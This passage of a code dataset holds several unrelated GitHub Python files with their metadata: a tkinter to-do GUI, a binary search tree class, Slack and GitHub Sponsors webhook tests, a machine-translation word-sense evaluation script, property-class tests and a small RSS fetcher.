limit=2, space=False, quote=False, width=4)\nhour_e.grid(row=0, column=0)\n\nday_e = autoE(due, 'day', only='Num', space=False, quote=False, limit=2, width=4)\nday_e.grid(row=0, column=5, pady=10, padx=20)\n\nmonth_e = autoE(due, placeholder='month', only='Num', space=False, quote=False, limit=2, width=6)\nmonth_e.grid(row=0, column=4)\n\nyear_e = autoE(due, placeholder='year', only='Num', limit=4, space=False, quote=False, width=4)\nyear_e.grid(row=0, column=3, padx=20)\n\npriF = Frame(maincp.frame)\npriF.grid(row=2, columnspan=2)\n\ndef fore(e):\n \n for b in radio:\n b['foreground'] = 'white'\n if e == \"de\":\n pri.set(0)\n return\n e.widget['foreground'] = 'black'\n\npri = IntVar()\ncolor = ['None', 'red', 'blue', 'green', 'brown', 'gray']\nradio = []\nfor x in range(1, 6):\n pri_O = Radiobutton(priF, variable=pri, text='priority ' + str(x), indicatoron=0, background=color[x], value=x, foreground='white', selectcolor='yellow')\n pri_O.bind('<Button-1>', fore)\n pri_O.grid(row=0, column=x)\n radio.append(pri_O)\npri_Od = Button(priF, text='No priority', command= lambda: fore(\"de\"), bg='pink', fg='black')\npri_Od.grid(row=0, column=6, padx=5, pady=5)\n\n\n\nUNDO = Cp(TaskF, expanded_text =\">>Unfinished Works\", collapsed_text =\"<<Unfinished Works\", name='undo')\nUNDO.pack(anchor='w')\n\nUndo_f = Frame(UNDO.frame, name='undo_f')\nUndo_f.pack(fill=BOTH, expand=True)\n\nUndo_c = Canvas(Undo_f, name='undo_c')\nUndo_c.pack(side=LEFT, fill=BOTH, expand=True)\nUndo_c.bind('<Configure>', FrameWidth)\n\nUndo_s = Scrollbar(Undo_f, command=Undo_c.yview, name='undo_s')\nUndo_s.pack(side=RIGHT, fill='y')\n\nUndo_cf = Frame(Undo_c, name='undo_cf', bg='white')\nUndo_cff = Undo_c.create_window((0,0), window=Undo_cf, anchor='nw')\n\nUndo_c.configure(yscrollcommand=Undo_s.set)\n\n\nUndo_c.bind('<Configure>', on_configure)\n\n\n\n\n\nFINI = Cp(TaskF, expanded_text='>>Finished', 
collapsed_text='<<Finished', name='fini')\nFINI.pack(anchor='w')\n\nFini_f = Frame(FINI.frame, name='fini_f')\nFini_f.pack(fill=BOTH, expand=True)\n\nFini_c = Canvas(Fini_f, name='fini_c')\nFini_c.pack(side=LEFT, fill=BOTH, expand=True)\nFini_c.bind('<Configure>', FrameWidth)\n\nFini_s = Scrollbar(Fini_f, command=Fini_c.yview, name='fini_s')\nFini_s.pack(side=RIGHT, fill='y')\n\nFini_cf = Frame(Fini_c, name='fini_cf', bg='white')\nFini_cff = Fini_c.create_window((0,0), window=Fini_cf, anchor='nw')\n\nFini_c.configure(yscrollcommand=Fini_s.set)\n\n\nFini_c.bind('<Configure>', on_configure)\n\n\n\n\n\n\n\n\n\n\n\n\n\nUndo_f.bind(\"<Configure>\", on_configure)\nFini_f.bind(\"<Configure>\", on_configure)\nUNDO.bind(\"<Configure>\", on_configure)\nFINI.bind(\"<Configure>\", on_configure)\n\n\n\n\n\n\n\n\n\n\n\n\nroot.mainloop()","repo_name":"Today100/Glossary","sub_path":"Tools_main_file/Pending/tdlist(pending)/trial2.py","file_name":"trial2.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"27017269023","text":"'''\nA BT is one of\nBT(Number, BT, BT)\nNone\n'''\nclass InvalidBinTreeError(Exception):\n pass\n\n\nclass BT:\n def __init__(self, num, left=None, right=None):\n # input validation\n if not (isinstance(left, BT) or left == None):\n raise InvalidBinTreeError(\"left tree is not a valid BT: {0}\".format(left))\n if not (isinstance(right, BT) or right == None):\n raise InvalidBinTreeError(\"right tree is not a valid BT: {0}\".format(right))\n\n self.num = num\n self.left = left\n self.right = right\n\n def flatten(self):\n '''returns a list with all nodes, using infix'''\n if self.left == None and self.right == None:\n return [self.num]\n elif self.left == None and isinstance(self.right, BT):\n return [self.num] + self.right.flatten()\n elif isinstance(self.left, BT) and self.right == None:\n return self.left.flatten() + [self.num]\n else:\n return self.left.flatten() + [self.num] + self.right.flatten()\n\n def __str__(self):\n if self.left == None and self.right == None:\n return \"({0}, (), ())\".format(self.num)\n elif self.left == None:\n return \"({0}, (), {1})\".format(self.num, str(self.right))\n elif self.right == None:\n return \"({0}, {1}, ())\".format(self.num, str(self.left))\n else:\n return \"({0}, {1}, {2})\".format(self.num, str(self.left), str(self.right))\n\n def __eq__(self, other):\n if other == None:\n return False\n else:\n return self.num == other.num and self.left == other.left and self.right == other.right\n\n def clone(self):\n if self.left == None and self.right == None:\n return BT(self.num)\n elif self.left == None:\n return BT(self.num, None, self.right.clone())\n elif self.right == None:\n return BT(self.num, self.left.clone(), None)\n else:\n # both branches are trees\n return BT(self.num, self.left.clone(), self.right.clone())\n\n\nclass UnorderedBSTError(Exception):\n pass\n\n\nclass BST(BT):\n def __init__(self, num, left=None, right=None):\n super().__init__(num, left, right)\n # validate tree structure\n if not self.isValid():\n raise UnorderedBSTError(\"BST is not properly ordered\")\n\n def isValid(self):\n '''is the tree a valid binary search tree?'''\n flattened = self.flatten()\n for i in range(0, len(flattened) - 1):\n if not flattened[i] < flattened[i + 1]:\n return False\n return True\n\n def __contains__(self, ele):\n if ele == self.num:\n return True\n elif ele < self.num:\n if self.left == None:\n return False\n else:\n # there's a left tree and it might be there\n return ele in self.left\n elif ele > self.num:\n if self.right == None:\n return False\n else:\n # there's a right tree and it might be there\n return ele in self.right\n else:\n return False\n\n def getPath(self, ele):\n # assume it's in the tree\n if ele == 
self.num:\n return \"/{0}\".format(self.num)\n elif ele < self.num:\n return \"/{0}{1}\".format(self.num, self.left.getPath(ele))\n elif ele > self.num:\n return \"/{0}{1}\".format(self.num, self.right.getPath(ele))\n","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/binTree/binTree.py","file_name":"binTree.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4544750715","text":"import binascii\nimport hashlib\nimport hmac\nimport json\nimport time\nfrom typing import Dict\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom django.test import Client, RequestFactory\nfrom django.urls import reverse\nfrom pytest_django.fixtures import SettingsWrapper\n\nfrom blossom.api.slack import client as slack_client\nfrom blossom.api.slack.actions import is_valid_github_request, process_action\nfrom blossom.api.views.slack import github_sponsors_endpoint\n\n# TODO: There is a way to mock decorators, but I can't figure it out.\n# There's a lot of testing that needs to happen for this module, but I can't\n# get past the threading decorator and the patch calls don't seem to work.\n# Resources:\n# https://stackoverflow.com/questions/7667567/can-i-patch-a-python-decorator-before-it-wraps-a-function # noqa: E501\n# http://alexmarandon.com/articles/python_mock_gotchas/\n# https://stackoverflow.com/questions/36812830/mocking-decorators-in-python-with-mock-and-pytest # noqa: E501\n\n# NOTE: In order to test slack, you must add the `settings` hook and set\n# `settings.ENABLE_SLACK = True`. MAKE SURE that if you're writing a new\n# test that uses ENABLE_SLACK that you patch `requests.post` or it will\n# try and ping modchat (if you're running locally) or explode if this is\n# running in the github actions pipeline.\n\nSLACK_SIGNING_SECRET = \"12345\"\n\n\ndef get_slack_headers(body: dict, settings: SettingsWrapper) -> dict:\n \"\"\"Mock the headers required by slack validation.\"\"\"\n create_time = str(int(time.time()))\n\n body = json.dumps(body)\n sig_basestring = \"v0:\" + create_time + \":\" + body\n signature = (\n \"v0=\"\n + hmac.new(\n bytes(settings.SLACK_SIGNING_SECRET, \"latin-1\"),\n msg=bytes(sig_basestring, \"latin-1\"),\n digestmod=hashlib.sha256,\n ).hexdigest()\n )\n\n return {\n \"HTTP_X-Slack-Signature\": signature,\n \"HTTP_X-Slack-Request-Timestamp\": create_time,\n }\n\n\ndef test_challenge_request(client: Client, settings: SettingsWrapper) -> None:\n \"\"\"Test handling of Slack's new endpoint challenge message.\"\"\"\n settings.SLACK_SIGNING_SECRET = SLACK_SIGNING_SECRET\n data = {\"challenge\": \"asdfasdfasdf\"}\n headers = get_slack_headers(data, settings)\n result = client.post(\n reverse(\"slack\"), json.dumps(data), content_type=\"application/json\", **headers\n )\n assert result.content == b\"asdfasdfasdf\"\n\n\n@pytest.mark.parametrize(\n \"test_data\",\n [\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": \"nope\", \"result\": False},\n {\n \"data\": {\"bbb\": \"ccc\"},\n \"signature\": \"sha1=757fc3cb2f66db92a1d164c116358660e4e7656e\",\n \"result\": True,\n },\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": \"sha1=ttthhhbbbttt\", \"result\": False},\n {\"data\": {\"aaa\": \"bbb\"}, \"signature\": None, \"result\": True},\n ],\n)\ndef test_is_github_valid_request(\n rf: RequestFactory, settings: SettingsWrapper, test_data: Dict\n) -> None:\n \"\"\"Test to ensure that a webhook from GitHub Sponsors is valid.\"\"\"\n request = rf.post(\n 
\"slack/github/sponsors/\",\n data=test_data[\"data\"],\n content_type=\"application/json\",\n )\n\n settings.GITHUB_SPONSORS_SECRET_KEY = \"shhh, it's a secret\"\n\n if not test_data[\"signature\"]:\n test_data[\"signature\"] = \"sha1={}\".format(\n binascii.hexlify(\n hmac.digest(\n msg=request.body,\n key=settings.GITHUB_SPONSORS_SECRET_KEY.encode(),\n digest=\"sha1\",\n )\n ).decode()\n )\n\n request.headers = {\"x-hub-signature\": test_data[\"signature\"]}\n assert is_valid_github_request(request) is test_data[\"result\"]\n\n\ndef test_github_missing_signature(rf: RequestFactory) -> None:\n \"\"\"Test to ensure a request that is missing the signature is marked invalid.\"\"\"\n \"\"\"Test to ensure that a webhook from GitHub Sponsors is valid.\"\"\"\n request = rf.post(\n \"slack/github/sponsors/\", data={\"aaa\": \"bbb\"}, content_type=\"application/json\"\n )\n assert is_valid_github_request(request) is False\n\n\n@pytest.mark.parametrize(\n \"test_data\",\n [\n {\n \"username\": \"bob\",\n \"tier\": \"A\",\n \"action\": \"created\",\n \"result\": \":tada: GitHub Sponsors: [created] - bob | A :tada:\",\n \"status_code\": 200,\n },\n {\n \"username\": \"bobbert\",\n \"tier\": \"B\",\n \"action\": \"cancelled\",\n \"result\": \":sob: GitHub Sponsors: [cancelled] - bobbert | B :sob:\",\n \"status_code\": 200,\n },\n {\n \"username\": \"bobby\",\n \"tier\": \"C\",\n \"action\": \"edited\",\n \"result\": (\":rotating_light: GitHub Sponsors: [edited] - bobby | C :rotating_light:\"),\n \"status_code\": 200,\n },\n ],\n)\ndef test_github_sponsor_slack_message(\n rf: RequestFactory, settings: SettingsWrapper, test_data: Dict\n) -> None:\n \"\"\"Test to ensure webhooks from GitHub Sponsors trigger appropriate slack pings.\"\"\"\n slack_client.chat_postMessage = MagicMock()\n request = rf.post(\n \"slack/github/sponsors/\",\n data={\n \"action\": test_data[\"action\"],\n \"sponsorship\": {\n \"sponsor\": {\"login\": test_data[\"username\"]},\n \"tier\": {\"name\": test_data[\"tier\"]},\n },\n },\n content_type=\"application/json\",\n )\n request.headers = {\n \"x-hub-signature\": \"sha1={}\".format(\n binascii.hexlify(\n hmac.digest(\n msg=request.body,\n key=settings.GITHUB_SPONSORS_SECRET_KEY.encode(),\n digest=\"sha1\",\n )\n ).decode()\n )\n }\n response = github_sponsors_endpoint(request)\n\n assert slack_client.chat_postMessage.call_args[1][\"text\"] == test_data[\"result\"]\n assert response.status_code == test_data[\"status_code\"]\n\n\ndef test_process_action_check() -> None:\n \"\"\"Test that a check action is routed correctly.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"check_approved_1\", \"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 1\n assert report_mock.call_count == 0\n assert message_mock.call_count == 0\n\n\ndef test_process_action_report() -> None:\n \"\"\"Test that a report action is routed correctly.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"approve_submission_3\", 
\"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 0\n assert report_mock.call_count == 1\n assert message_mock.call_count == 0\n\n\ndef test_process_action_unknown() -> None:\n \"\"\"Test that an error message is sent for an unknown action.\"\"\"\n data = {\n \"channel\": {\"id\": \"C065W1189\", \"name\": \"forgotten-works\"},\n \"actions\": [{\"name\": \"Approve\", \"value\": \"asdas\", \"type\": \"button\"}],\n \"user\": {\"id\": \"U045VRZFT\", \"name\": \"Modulo\"},\n \"message_ts\": \"1458170866.000004\",\n }\n\n with patch(\n \"blossom.api.slack.actions.process_check_action\", return_value=None\n ) as check_mock, patch(\n \"blossom.api.slack.actions.process_submission_report_update\"\n ) as report_mock, patch(\n \"blossom.api.slack.actions.client.chat_postMessage\"\n ) as message_mock:\n process_action(data)\n\n assert check_mock.call_count == 0\n assert report_mock.call_count == 0\n assert message_mock.call_count == 1\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/api/tests/slack/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":8473,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"16336723552","text":"#! /usr/bin/env python3\n\nimport sys, glob\nfrom qe_tokenization import perform_tokenization\nimport argparse\nimport stanza\nfrom spacy_stanza import StanzaLanguage\nimport pandas as pd\nfrom utils import load_text_file\nfrom spacy_dummy_tokenizer import WhitespaceTokenizer\n\n\ndef processLanguagePair(lgpair, keyfile_prefix, rawtranslations_glob, output_path):\n \"\"\"\n params:\n lgpair: translation language direction, e.g., en-de\n keyfile_prefix: prefix of the provided key files\n rawtranslations_glob: raw, detokenized translations\n output_path: path to store the WSD indices and their correct/incorrect labels. 
a dataframe with\n columns ['Sentence', 'Correct WSD output', 'Wrong WSD words indices']\n \"\"\"\n\n # load sense keys from file\n sense_keys = []\n k = load_text_file(keyfile_prefix + \".key.txt\")\n for line in k:\n elements = line.strip().split(\"\\t\")\n t = (elements[0], elements[1], elements[2], tuple(elements[3].split(\" \")), tuple(elements[4].split(\" \")))\n sense_keys.append(t)\n\n # load domain keys from file\n indomain_keys = set()\n outdomain_keys = set()\n d = load_text_file(keyfile_prefix + \".domain.txt\")\n for line in d:\n elements = line.strip().split(\"\\t\")\n if elements[2] == \"in\":\n indomain_keys.add((elements[0], elements[1]))\n else:\n outdomain_keys.add((elements[0], elements[1]))\n\n # load lemmatizer\n snlp = stanza.Pipeline(lang=lgpair[-2:])\n nlp = StanzaLanguage(snlp)\n # Replace the default tokenizer in the pipeline with the dummy tokenizer, since we will use this on\n # pre-tokenized text\n nlp.tokenizer = WhitespaceTokenizer(nlp)\n\n # load and process submissions\n results = {}\n rawsubmissions = sorted(glob.glob(rawtranslations_glob))\n for rawsubmission in rawsubmissions:\n # Create the df to store the sentence and word level WSD correct/incorrect result\n wsd_labels_df = pd.DataFrame(columns=['Sentence', 'Correct WSD output', 'Wrong WSD words indices'])\n\n counts = {\"pos_in\": 0, \"pos_out\": 0, \"neg_in\": 0, \"neg_out\": 0, \"unk_in\": 0, \"unk_out\": 0}\n trans_sentences = load_text_file(rawsubmission)\n trans_sentences_tok = perform_tokenization(lang=lgpair[-2:], inlist=trans_sentences)\n\n wsd_labels_df['Sentence'] = trans_sentences\n\n for i, (trans_sentence, trans_sentence_tok, key) in \\\n enumerate(zip(trans_sentences, trans_sentences_tok, sense_keys)):\n if (key[2], \" \".join(key[3])) in indomain_keys:\n suffix = \"_in\"\n elif (key[2], \" \".join(key[3])) in outdomain_keys:\n suffix = \"_out\"\n else:\n print(\"Domain not found:\", (key[2], \" \".join(key[3])))\n\n # first look in tokenized data\n tokwords = [x.lower() for x in trans_sentence_tok]\n posfound = any([posword in tokwords for posword in key[3]])\n negfound = any([negword in tokwords for negword in key[4]])\n\n negative_indices = []\n # Store the indices of the negative words in the tokenized sentence\n if negfound:\n for tokword_i, tokword in enumerate(tokwords):\n if tokword in key[4]:\n negative_indices.append(tokword_i)\n\n # if not found, look in lemmatized data\n if (not posfound) and (not negfound):\n posfound = False\n negfound = False\n\n # Perform lemmatization\n doc = nlp(trans_sentence)\n for token_i, token in enumerate(doc):\n if token.lemma_.lower() in key[3]:\n posfound = True\n if token.lemma_.lower() in key[4]:\n negfound = True\n negative_indices.append(token_i)\n\n if posfound and not negfound:\n counts[\"pos\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = True\n elif negfound:\n counts[\"neg\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = False\n else:\n counts[\"unk\" + suffix] += 1\n wsd_labels_df['Correct WSD output'].iloc[i] = None\n\n wsd_labels_df['Wrong WSD words indices'].iloc[i] = negative_indices\n\n wsd_labels_df.to_csv(output_path)\n\n counts[\"cov_in\"] = (counts[\"pos_in\"] + counts[\"neg_in\"]) / (\n counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"unk_in\"])\n counts[\"cov_out\"] = (counts[\"pos_out\"] + counts[\"neg_out\"]) / (\n counts[\"pos_out\"] + counts[\"neg_out\"] + counts[\"unk_out\"])\n counts[\"cov_all\"] = (counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + 
counts[\"neg_out\"]) / (\n counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"unk_in\"] + counts[\"pos_out\"] + counts[\"neg_out\"] +\n counts[\"unk_out\"])\n\n # Precision = pos / (pos+neg)\n counts[\"prec_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (counts[\"pos_in\"] + counts[\"neg_in\"])\n counts[\"prec_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"neg_out\"])\n counts[\"prec_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + counts[\"neg_out\"])\n\n # RecallA = pos / (pos+unk)\n # This is the definition of recall that was used to compute the results tables\n # in the papers, but *does not* correspond to the definition given in the papers.\n counts[\"recA_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (counts[\"pos_in\"] + counts[\"unk_in\"])\n counts[\"recA_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"unk_out\"])\n counts[\"recA_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"pos_out\"] + counts[\"unk_out\"])\n\n # RecallB = pos / (pos+unk+neg)\n # This formula corresponds to the definition given in the papers,\n # but is *not* the one that was used to compute the results tables.\n counts[\"recB_in\"] = 0 if counts[\"pos_in\"] == 0 else counts[\"pos_in\"] / (\n counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"neg_in\"])\n counts[\"recB_out\"] = 0 if counts[\"pos_out\"] == 0 else counts[\"pos_out\"] / (\n counts[\"pos_out\"] + counts[\"unk_out\"] + counts[\"neg_out\"])\n counts[\"recB_all\"] = 0 if (counts[\"pos_in\"] + counts[\"pos_out\"]) == 0 else (counts[\"pos_in\"] + counts[\n \"pos_out\"]) / (counts[\"pos_in\"] + counts[\"unk_in\"] + counts[\"neg_in\"] + counts[\"pos_out\"] + counts[\n \"unk_out\"] + counts[\"neg_out\"])\n\n # F1A is based on RecallA\n counts[\"f1A_in\"] = 0 if (counts[\"prec_in\"] + counts[\"recA_in\"]) == 0 else 2 * counts[\"prec_in\"] * counts[\n \"recA_in\"] / (counts[\"prec_in\"] + counts[\"recA_in\"])\n counts[\"f1A_out\"] = 0 if (counts[\"prec_out\"] + counts[\"recA_out\"]) == 0 else 2 * counts[\"prec_out\"] * counts[\n \"recA_out\"] / (counts[\"prec_out\"] + counts[\"recA_out\"])\n counts[\"f1A_all\"] = 0 if (counts[\"prec_all\"] + counts[\"recA_all\"]) == 0 else 2 * counts[\"prec_all\"] * counts[\n \"recA_all\"] / (counts[\"prec_all\"] + counts[\"recA_all\"])\n\n # F1B is based on RecallB\n counts[\"f1B_in\"] = 0 if (counts[\"prec_in\"] + counts[\"recB_in\"]) == 0 else 2 * counts[\"prec_in\"] * counts[\n \"recB_in\"] / (counts[\"prec_in\"] + counts[\"recB_in\"])\n counts[\"f1B_out\"] = 0 if (counts[\"prec_out\"] + counts[\"recB_out\"]) == 0 else 2 * counts[\"prec_out\"] * counts[\n \"recB_out\"] / (counts[\"prec_out\"] + counts[\"recB_out\"])\n counts[\"f1B_all\"] = 0 if (counts[\"prec_all\"] + counts[\"recB_all\"]) == 0 else 2 * counts[\"prec_all\"] * counts[\n \"recB_all\"] / (counts[\"prec_all\"] + counts[\"recB_all\"])\n\n submissionName = rawsubmission.split(\"/\")[-1]\n results[submissionName] = counts\n\n print(lgpair.upper())\n print()\n print(\n \"Submission\\t\\tInPos\\tInNeg\\tInUnk\\tInCoverage\\tInPrecision\\tInRecallA\\tInRecallB\\tInFscoreA\\tInFscoreB\\t\"\n 
\"\\tOutPos\\tOutNeg\\tOutUnk\\tOutCoverage\\tOutPrecision\\tOutRecallA\\tOutRecallB\\tOutFscoreA\\tOutFscoreB\\t\"\n \"\\tAllPos\\tAllNeg\\tAllUnk\\tAllCoverage\\tAllPrecision\\tAllRecallA\\tAllRecallB\\tAllFscoreA\\tAllFscoreB\")\n for submission, result in sorted(results.items(), key=lambda x: x[1][\"f1A_all\"], reverse=True):\n s = submission\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(result[\"pos_in\"],\n result[\"neg_in\"],\n result[\"unk_in\"],\n 100 * result[\"cov_in\"],\n 100 * result[\"prec_in\"],\n 100 * result[\"recA_in\"],\n 100 * result[\"recB_in\"],\n 100 * result[\"f1A_in\"],\n 100 * result[\"f1B_in\"])\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(result[\"pos_out\"],\n result[\"neg_out\"],\n result[\"unk_out\"],\n 100 * result[\"cov_out\"],\n 100 * result[\"prec_out\"],\n 100 * result[\"recA_out\"],\n 100 * result[\"recB_out\"],\n 100 * result[\"f1A_out\"],\n 100 * result[\"f1B_out\"])\n s += \"\\t\\t{}\\t{}\\t{}\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\\t{:.2f}%\".format(\n result[\"pos_in\"] + result[\"pos_out\"], result[\"neg_in\"] + result[\"neg_out\"],\n result[\"unk_in\"] + result[\"unk_out\"], 100 * result[\"cov_all\"], 100 * result[\"prec_all\"],\n 100 * result[\"recA_all\"], 100 * result[\"recB_all\"], 100 * result[\"f1A_all\"], 100 * result[\"f1B_all\"])\n print(s)\n print()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--lgpair', type=str, default='en-de')\n parser.add_argument('--keyfileprefix',\n type=str,\n default='txt/en-de',\n help='path of the *.key.txt and *.domain.txt files')\n parser.add_argument('--rawtranslations', type=str,\n help='path of the detokenized translation output')\n parser.add_argument('--output_path', type=str,\n help='path to store the WSD correct/incorrect labels and erroneous token indices')\n\n args = parser.parse_args()\n print(args)\n\n processLanguagePair(args.lgpair, args.keyfileprefix, args.rawtranslations, args.output_path)\n","repo_name":"TuAnh23/MuCoW","sub_path":"WMT2019/translation test suite/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":11986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70990525265","text":"from __future__ import annotations\n\n# System imports\nfrom copy import copy\n\n# Third-party imports\nimport pytest\n\n# Local imports\nfrom openide.nodes.properties_support import GetterSetterProperty\n\n\nclass RWMethods:\n\n def __init__(self) -> None:\n self.__attr = 0\n\n def get_attr(self) -> int:\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = value\n\n not_a_method = 45\n\n\ndef test_read_write() -> None:\n rw = RWMethods()\n\n def check(prop: GetterSetterProperty, init_value: int, set_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is True\n\n assert prop.value == init_value\n assert rw.get_attr() == init_value\n prop.value = set_value\n assert prop.value == set_value\n assert rw.get_attr() == set_value\n\n prop = GetterSetterProperty(rw.get_attr, rw.set_attr)\n check(prop, 0, 12)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 12, 24)\n check(prop, 24, 36)\n\n\nclass ROMethods:\n\n def __init__(self, value: int) -> None:\n self.__attr = value\n\n def get_attr(self) -> int:\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = 
value\n\n\ndef test_read_only() -> None:\n ro = ROMethods(72)\n\n def check(prop: GetterSetterProperty, init_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is False\n\n assert prop.value == init_value\n\n with pytest.raises(AttributeError):\n prop.value = 12\n\n prop = GetterSetterProperty(ro.get_attr)\n check(prop, 72)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 72)\n\n ro.set_attr(46)\n check(prop, 46)\n check(cloned_prop, 46)\n\n\ndef test_write_only() -> None:\n wo = RWMethods()\n\n def check(prop: GetterSetterProperty, init_value: int, set_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is False\n assert prop.can_write is True\n\n assert wo.get_attr() == init_value\n prop.value = set_value\n assert wo.get_attr() == set_value\n\n with pytest.raises(AttributeError):\n _ = prop.value\n\n prop = GetterSetterProperty(None, wo.set_attr)\n check(prop, 0, 27)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 27, 54)\n check(prop, 54, 81)\n\n\ndef test_not_method() -> None:\n rw = RWMethods()\n\n with pytest.raises(TypeError):\n GetterSetterProperty(rw.not_a_method) # type: ignore\n\n with pytest.raises(TypeError):\n GetterSetterProperty(None, rw.not_a_method) # type: ignore\n\n\ndef test_no_getter_and_setter() -> None:\n with pytest.raises(ValueError):\n GetterSetterProperty()\n\n\nclass NoTypeGetter:\n\n def __init__(self, value: int) -> None:\n self.__attr = value\n\n def get_attr(self): # type: ignore\n return self.__attr\n\n def set_attr(self, value: int) -> None:\n self.__attr = value\n\n\ndef test_no_type_hint() -> None:\n ro = NoTypeGetter(83)\n\n with pytest.raises(ValueError):\n GetterSetterProperty(ro.get_attr)\n\n def check(prop: GetterSetterProperty, init_value: int) -> None:\n assert prop.value_type is int\n assert prop.can_read is True\n assert prop.can_write is False\n\n assert prop.value == init_value\n\n with pytest.raises(AttributeError):\n prop.value = 12\n\n prop = GetterSetterProperty(ro.get_attr, value_type=int)\n check(prop, 83)\n\n cloned_prop = copy(prop)\n check(cloned_prop, 83)\n\n ro.set_attr(41)\n check(prop, 41)\n check(cloned_prop, 41)\n","repo_name":"AxelVoitier/openide","sub_path":"tests/nodes/properties/test_getter_setter_property.py","file_name":"test_getter_setter_property.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15619478174","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\n\nclass UrlNotFound(BaseException):\n e_message = \"cannot open url\"\n ...\n\ndef get_urls(main_url: str, paths: list[str]) -> list[str]:\n urls = []\n\n for idx, path in enumerate(paths):\n urls.append(main_url + path)\n\n return urls\n\n\ndef get_xml(url: str = \"\") -> BeautifulSoup:\n\n r:requests.Response = requests.get(url)\n\n if r.status_code == 200:\n content = r.content\n return BeautifulSoup(content, \"lxml-xml\")\n raise UrlNotFound\n\n\n\nif __name__ == '__main__':\n print(get_xml(\"https://www.welt.de/feeds/ooh/out-of-home/bundesliga/news\").prettify())\n","repo_name":"Askil61/Bundesliga","sub_path":"app/py/get_xml.py","file_name":"get_xml.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33752017661","text":"import PyPDF2 as pdf\r\nimport os\r\n\r\ninputdir = 
